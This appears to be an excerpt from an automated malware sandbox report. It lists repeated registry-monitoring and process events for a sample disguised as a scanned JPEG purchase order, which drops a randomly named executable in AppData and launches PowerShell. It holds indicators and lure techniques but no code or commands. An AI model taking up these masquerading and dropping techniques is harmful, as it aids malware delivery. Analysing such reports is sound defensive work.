                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
